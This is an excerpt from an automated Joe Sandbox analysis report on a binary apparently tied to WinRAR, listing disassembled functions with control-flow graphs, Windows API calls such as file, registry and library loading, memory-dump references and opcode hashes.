                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LoadString
                                                                                                                                                                    • String ID: $$@$CMT
                                                                                                                                                                    • API String ID: 2948472770-369980109
                                                                                                                                                                    • Opcode ID: fa638b40cb8595eac64ea6e3f8fddc8228e0d784507ab9d2c2576f9b66d4e731
                                                                                                                                                                    • Instruction ID: fb21209941f985fc7ac95aa6465d9954197c10a7f20e07b2ce28aaa46806afe6
                                                                                                                                                                    • Opcode Fuzzy Hash: fa638b40cb8595eac64ea6e3f8fddc8228e0d784507ab9d2c2576f9b66d4e731
                                                                                                                                                                    • Instruction Fuzzy Hash: E6C1B67460438456EB11DE75C8C07DA3BD26F46308F0C84FADC49AE3C7D6BE89A4876A
                                                                                                                                                                    Function 00432277 Relevance: 4.1, Strings: 3, Instructions: 302COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: $$$%s%s
                                                                                                                                                                    • API String ID: 0-1151979480
                                                                                                                                                                    • Opcode ID: 34ba9c38a56cbb7fc46635a82a913a50ccb7ead3ae3c13607334beb6c097f494
                                                                                                                                                                    • Instruction ID: 0f23be909333ae859590d09558381e7471fa97d56614783225cfe4c5a55658f0
                                                                                                                                                                    • Opcode Fuzzy Hash: 34ba9c38a56cbb7fc46635a82a913a50ccb7ead3ae3c13607334beb6c097f494
                                                                                                                                                                    • Instruction Fuzzy Hash: B0D14B709046855FEF25DF30C9853EFBBA1AF19305F1861BFC85956282C3F81A85CB59
                                                                                                                                                                    Function 0040A5C4 Relevance: 3.2, Strings: 2, Instructions: 665COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastPointer
                                                                                                                                                                    • String ID: - ???$???
                                                                                                                                                                    • API String ID: 2976181284-174637405
                                                                                                                                                                    • Opcode ID: bba24b76f683cc7f79ee130113dfb80935d7ea96f0763d1b00edb491545f7972
                                                                                                                                                                    • Instruction ID: 4033c0e2c017294a1755c7fa5a05da136508a19136716e7f54a7dd53f52af202
                                                                                                                                                                    • Opcode Fuzzy Hash: bba24b76f683cc7f79ee130113dfb80935d7ea96f0763d1b00edb491545f7972
                                                                                                                                                                    • Instruction Fuzzy Hash: 8F520470A007069BD718DF65C480AEEF3F6FF44304F14863BD459A7285E778A966CB8A
                                                                                                                                                                    Function 0043CEF4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 107COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 0 43cef4-43cf0d SetHandleCount 1 43cf15-43cf3a GetStartupInfoA 0->1 2 43cf0f 0->2 3 43cf40-43cf53 1->3 4 43cfda-43cfdf 1->4 2->1 3->4 5 43cf59-43cf6b 3->5 6 43cfe1-43d007 GetStdHandle * 3 4->6 7 43d046-43d04c 4->7 8 43cfa9-43cfb3 5->8 9 43cf6d-43cf75 5->9 10 43d00c-43d00d call 43c968 6->10 11 43cfbd-43cfc3 8->11 12 43cf77 9->12 13 43cf7c-43cf7f 9->13 17 43d012-43d015 10->17 15 43cfb5-43cfba 11->15 16 43cfc5-43cfd7 call 43bad4 11->16 12->13 18 43cf81 13->18 19 43cf86-43cf89 13->19 15->11 16->4 23 43d020-43d02d 17->23 24 43d017-43d01e 17->24 18->19 20 43cf92 19->20 21 43cf8b-43cf90 19->21 27 43cf97-43cfa7 20->27 21->27 25 43d02f-43d035 23->25 26 43d03d-43d044 23->26 24->23 29 43d037 24->29 25->26 26->7 26->10 27->8 27->9 29->26
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetHandleCount.KERNEL32(00000032), ref: 0043CF00
                                                                                                                                                                    • GetStartupInfoA.KERNEL32(?), ref: 0043CF2A
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 0043CFE3
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,000000F6), ref: 0043CFEF
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,000000F5,000000F6), ref: 0043CFFB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Handle$CountInfoStartup
                                                                                                                                                                    • String ID: qD$qD
                                                                                                                                                                    • API String ID: 2024372269-815347720
                                                                                                                                                                    • Opcode ID: a08a4fe0dd2a79791531bcb9a97e9fe0daf3a12675d0a6a2387db013b100ad98
                                                                                                                                                                    • Instruction ID: 5e99c3203f10f1765382fcb20c623af8126b8e92a939d8887fdfc57698691129
                                                                                                                                                                    • Opcode Fuzzy Hash: a08a4fe0dd2a79791531bcb9a97e9fe0daf3a12675d0a6a2387db013b100ad98
                                                                                                                                                                    • Instruction Fuzzy Hash: 5F3124719043008BF7189F28C8D57AA77A1EB49728F24563FE492933D1DB3C9886CB1E
                                                                                                                                                                    Function 00403674 Relevance: 9.2, APIs: 6, Instructions: 165fileCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 113 403674-403686 114 403830-403836 113->114 115 40368c-403690 113->115 116 403692-403696 115->116 117 4036b3-4036c0 115->117 118 403698-403699 116->118 119 40369d-4036a7 GetStdHandle 116->119 120 4036c2-4036c6 117->120 121 40370f-403729 WriteFile 117->121 122 4036a9-4036b0 GetStdHandle 118->122 123 40369b 118->123 119->117 124 4036c8-4036d8 120->124 125 40372c-403730 120->125 121->125 122->117 123->117 126 4036e0 124->126 127 4036da-4036de 124->127 128 403736-40373a 125->128 129 40382c 125->129 131 4036e5-403701 WriteFile 126->131 127->131 128->129 130 403740-403744 128->130 129->114 130->129 132 40374a-403778 GetLastError call 403a68 call 4042e8 SetLastError 130->132 131->125 133 403703-40370b 131->133 139 403781 132->139 140 40377a-40377d 132->140 133->124 135 40370d 133->135 135->125 141 4037c9-4037d8 call 433a6c 139->141 143 403783-40379a 139->143 140->141 142 40377f 140->142 150 403816-403825 call 433a20 141->150 151 4037da-4037df 141->151 142->143 145 4037a3 143->145 146 40379c-40379f 143->146 145->141 149 4037a5-4037b1 145->149 146->141 148 4037a1 146->148 148->149 152 4037b3-4037b6 149->152 153 4037ba 149->153 150->129 151->117 155 4037e5-4037e9 151->155 152->141 157 4037b8 152->157 153->141 154 4037bc-4037c4 call 433a38 153->154 154->141 155->117 159 4037ef-403811 call 403a68 call 4039b0 155->159 157->154 159->117
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,00000000,00453DB0), ref: 0040369F
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,00453DB0), ref: 004036AB
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00004000,?,00000000,00000000,?,00000000,?,?,00000000,?,00000000,?,00000000,00453DB0), ref: 004036EF
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00000000,00453DB0), ref: 0040371C
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,?,00000000,?,00000000,00453DB0), ref: 0040374A
                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000000,?,00000000,?,00000000,00453DB0), ref: 0040376D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileHandleLastWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3069693752-0
                                                                                                                                                                    • Opcode ID: d9c3f8a4e6c04e7d3980eadee259c291888d30a636169f4c9cb58cee12fe3089
                                                                                                                                                                    • Instruction ID: 881c9e5fd9bc7f1efc9f36dbc0b598fbe79db55042927d7bf25e290ab663105c
                                                                                                                                                                    • Opcode Fuzzy Hash: d9c3f8a4e6c04e7d3980eadee259c291888d30a636169f4c9cb58cee12fe3089
                                                                                                                                                                    • Instruction Fuzzy Hash: B351E6B0A04505ABDB10DE69898177EBBADAF80716F14C27BE511B33C0C73C9F458B9A
                                                                                                                                                                    Function 00402008 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 165 402008-40202f SHGetMalloc SHGetSpecialFolderLocation 166 402031-40203c SHGetPathFromIDListA 165->166 167 40207d-40207f 165->167 166->167 170 40203e-402041 166->170 168 402081-402090 GetModuleFileNameA call 401fd8 167->168 169 402095-4020a6 167->169 168->169 170->167 172 402043-402063 call 401f08 call 43bbc4 call 404404 170->172 180 402065-402072 call 403ef8 172->180 181 402078 172->181 180->181 184 402074-402076 180->184 181->167 184->167
                                                                                                                                                                    APIs
                                                                                                                                                                    • SHGetMalloc.SHELL32(?), ref: 00402016
                                                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,0000001A,?,00000000,?), ref: 00402028
                                                                                                                                                                    • SHGetPathFromIDListA.SHELL32(?,?,00000000,0000001A,?,00000000,?), ref: 00402035
                                                                                                                                                                      • Part of subcall function 00404404: GetFileAttributesW.KERNEL32(00000000,?,00000000,00402061), ref: 0040441E
                                                                                                                                                                      • Part of subcall function 00403EF8: CreateDirectoryW.KERNEL32(00000000,00000000,00451DB0,?,00000000,00402070), ref: 00403F17
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000400,00000000,0000001A,?,00000000,?), ref: 00402089
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$AttributesCreateDirectoryFolderFromListLocationMallocModuleNamePathSpecial
                                                                                                                                                                    • String ID: WinRAR
                                                                                                                                                                    • API String ID: 4202854431-3970807970
                                                                                                                                                                    • Opcode ID: ede0b9742715122b99fbed7b8d171714e6b9ef33f6bfdea241b1364475fa6542
                                                                                                                                                                    • Instruction ID: 070f3ed3a1e0129b4ba182c6cb703402b41c29958847485536f20167dde97ae7
                                                                                                                                                                    • Opcode Fuzzy Hash: ede0b9742715122b99fbed7b8d171714e6b9ef33f6bfdea241b1364475fa6542
                                                                                                                                                                    • Instruction Fuzzy Hash: 5F110C21B0431476FB1169765D4AF9F76984F04755F14003BFB45B22D2EFBD9A01C25D
                                                                                                                                                                    Function 004020A8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40registryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 185 4020a8-4020cd RegOpenKeyExA 186 4020f6-4020f9 185->186 187 4020cf-4020f1 RegQueryValueExA RegCloseKey 185->187 188 402108-40210a call 402008 186->188 189 4020fb-402106 call 404404 186->189 187->186 193 40210f-402113 188->193 189->188 189->193
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\WinRAR\Paths,00000000,00000001,?,?), ref: 004020C6
                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,AppData,00000000,?,?,?,80000001,Software\WinRAR\Paths,00000000,00000001,?,?), ref: 004020E9
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,AppData,00000000,?,?,?,80000001,Software\WinRAR\Paths,00000000,00000001,?,?), ref: 004020F1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                    • String ID: AppData$Software\WinRAR\Paths
                                                                                                                                                                    • API String ID: 3677997916-3415417297
                                                                                                                                                                    • Opcode ID: 1bd70768771eb461b5141f324264bd21e5d8852c252e6a9dee15c6ef2eddbcd0
                                                                                                                                                                    • Instruction ID: f92515a06ab27ac57bfa4f792cebdbf17a148f1d9ade4cd3942498d1d0729c34
                                                                                                                                                                    • Opcode Fuzzy Hash: 1bd70768771eb461b5141f324264bd21e5d8852c252e6a9dee15c6ef2eddbcd0
                                                                                                                                                                    • Instruction Fuzzy Hash: 00F09C706403087BFF10AA558DC7F99775C6B45708F1041E6BB04B51D2EAF95F44C259
                                                                                                                                                                    Function 0042E76C Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 247COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 780 42e76c-42e770 781 42e775-42e77d 780->781 781->781 782 42e77f-42e799 call 43bd6d 781->782 785 42e7d4-42e7e1 call 43bca0 782->785 786 42e79b-42e7c1 GetModuleFileNameA call 43bd85 782->786 791 42e7e4-42e801 call 4031a0 call 403234 785->791 792 42ea57-42ea5d 786->792 793 42e7c7-42e7d2 call 43bca0 786->793 799 42e806-42e808 791->799 793->791 800 42e80a-42e81a call 4031f0 799->800 801 42e81f-42e82b 799->801 800->792 803 42e8c2-42e8c6 801->803 804 42e8d2-42e8d6 803->804 805 42e8c8-42e8cc 803->805 808 42e8d8-42e8e8 call 4031f0 804->808 809 42e8ed-42e91b call 4039b0 call 43acd0 804->809 805->804 807 42e830-42e859 call 403a68 call 403838 805->807 807->804 820 42e85b-42e85d 807->820 808->792 821 42e932-42e952 call 403838 809->821 822 42e91d-42e92d call 4031f0 809->822 823 42e8a0-42e8a5 820->823 830 42e9e4-42e9e7 821->830 822->792 826 42e8a7-42e8bf call 4039b0 823->826 827 42e85f-42e86b 823->827 826->803 831 42e89f 827->831 832 42e86d-42e879 827->832 835 42e957-42e962 830->835 836 42e9ed-42e9fb 830->836 831->823 832->831 834 42e87b-42e895 call 43bd2c 832->834 834->831 850 42e897-42e89d 834->850 835->836 838 42e968-42e96b 835->838 840 42ea21-42ea29 836->840 841 42e9cc-42e9cf 838->841 842 42e96d-42e97a 838->842 844 42ea2b-42ea52 call 440e64 call 4031f0 840->844 845 42e9fd-42ea08 840->845 846 42e9d1-42e9d4 841->846 847 42e9d6 841->847 848 42e98a-42e98d 842->848 849 42e97c 842->849 844->792 851 42ea20 845->851 852 42ea0a-42ea14 845->852 846->847 855 42e9db-42e9e2 846->855 847->855 858 42e9a6-42e9ac 848->858 859 42e98f-42e992 848->859 856 42e9ae-42e9b4 849->856 857 42e97e-42e981 849->857 850->826 851->840 852->851 860 42ea16-42ea1b call 42aca4 852->860 855->830 867 42e9c2-42e9c6 856->867 862 42e983-42e986 857->862 863 42e99e-42e9a4 857->863 858->867 864 42e9b6-42e9bc 859->864 865 42e994 859->865 860->851 869 42e996-42e99c 862->869 870 42e988 862->870 863->867 864->867 871 42e9be 865->871 867->841 868 42e9c8-42e9ca 867->868 868->830 869->867 870->871 871->867
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 0042E7A9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileModuleName
                                                                                                                                                                    • String ID: *messages***$@$n
                                                                                                                                                                    • API String ID: 514040917-964326655
                                                                                                                                                                    • Opcode ID: 1346a92aed611b78c35d0d4c845c0325a03b74ba2d5dfaac99c1a20e5a19c963
                                                                                                                                                                    • Instruction ID: 97c6531417d5769555d66c9ce674ea1f9b5007def1bc7a531af5e7c4b283735a
                                                                                                                                                                    • Opcode Fuzzy Hash: 1346a92aed611b78c35d0d4c845c0325a03b74ba2d5dfaac99c1a20e5a19c963
                                                                                                                                                                    • Instruction Fuzzy Hash: E4912A70B002648BD730DF2AD8C1BAAB7B9AF09304F5444BFE5D597382D7789A81CB19
                                                                                                                                                                    Function 0043A3BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1030 43a3bc-43a3c0 1031 43a3c5-43a3cd 1030->1031 1031->1031 1032 43a3cf-43a448 call 433da8 call 43a3ac SetErrorMode GetModuleHandleA call 40ef24 call 42e764 call 439bf0 call 42c078 call 42c648 1031->1032 1047 43a464-43a46b 1032->1047 1048 43a44a-43a454 call 42c6fc 1032->1048 1050 43a482-43a4b6 call 42c590 call 42bb70 call 42baec 1047->1050 1051 43a46d-43a480 call 42c260 1047->1051 1052 43a459-43a45f call 42c628 1048->1052 1062 43a4c5 1050->1062 1063 43a4b8-43a4bf 1050->1063 1051->1050 1052->1047 1065 43a4ca-43a4eb call 42da8c call 42dfe4 1062->1065 1063->1062 1064 43a4c1-43a4c3 1063->1064 1064->1065 1069 43a4f0-43a507 call 42c0b0 call 403d48 1065->1069 1074 43a509 call 40c734 1069->1074 1075 43a50e-43a519 1069->1075 1074->1075
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetErrorMode.KERNEL32(00008005), ref: 0043A3F7
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00008005), ref: 0043A3FE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorHandleModeModule
                                                                                                                                                                    • String ID: rar.lng
                                                                                                                                                                    • API String ID: 1812511831-2410228151
                                                                                                                                                                    • Opcode ID: f64f59848f5f72359563d1d1cf7d52ea9bb2c4b62e2d0b4673652066d0cbb565
                                                                                                                                                                    • Instruction ID: fd660195847409d479635bcc7ef493d72a91b7fab19d91c72dbee25062ff42cf
                                                                                                                                                                    • Opcode Fuzzy Hash: f64f59848f5f72359563d1d1cf7d52ea9bb2c4b62e2d0b4673652066d0cbb565
                                                                                                                                                                    • Instruction Fuzzy Hash: 96312870B801685ACB20FB65DC815CE73649F56318F4140FFA858A3352DBBC9E898B5F
                                                                                                                                                                    Function 0040EF24 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48libraryCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 1077 40ef24-40ef3f call 40efb4 1080 40ef41-40ef51 call 43bca0 1077->1080 1081 40ef53-40ef61 GetModuleFileNameA 1077->1081 1083 40ef66-40ef9d call 4019f4 call 43bca0 LoadLibraryA 1080->1083 1081->1083 1089 40efa5-40efb1 1083->1089 1090 40ef9f 1083->1090 1090->1089
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040EFB4: FreeLibrary.KERNEL32(?,0040EF3D), ref: 0040EFC2
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000400), ref: 0040EF61
                                                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 0040EF86
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$FileFreeLoadModuleName
                                                                                                                                                                    • String ID: rarlng.dll
                                                                                                                                                                    • API String ID: 4229844642-1675521814
                                                                                                                                                                    • Opcode ID: 7dc0098acf12c7a67b9cd77dfa2772e876b6d3724d32a7201086551cb32fa549
                                                                                                                                                                    • Instruction ID: 25dd29a27e64bd20548a71f877349c0376763f07e1ee08de5f796fe3ca92f939
                                                                                                                                                                    • Opcode Fuzzy Hash: 7dc0098acf12c7a67b9cd77dfa2772e876b6d3724d32a7201086551cb32fa549
                                                                                                                                                                    • Instruction Fuzzy Hash: 620120B690021436D7209B36AC42B96735CAB85719F0445FFF708F3241EFB84D0197AD
                                                                                                                                                                    Function 0042DFE4 Relevance: 5.3, Strings: 4, Instructions: 270COMMON
